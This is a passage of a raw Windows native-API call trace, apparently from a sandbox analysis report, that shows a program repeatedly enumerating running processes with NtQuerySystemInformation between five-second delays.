Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.815] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 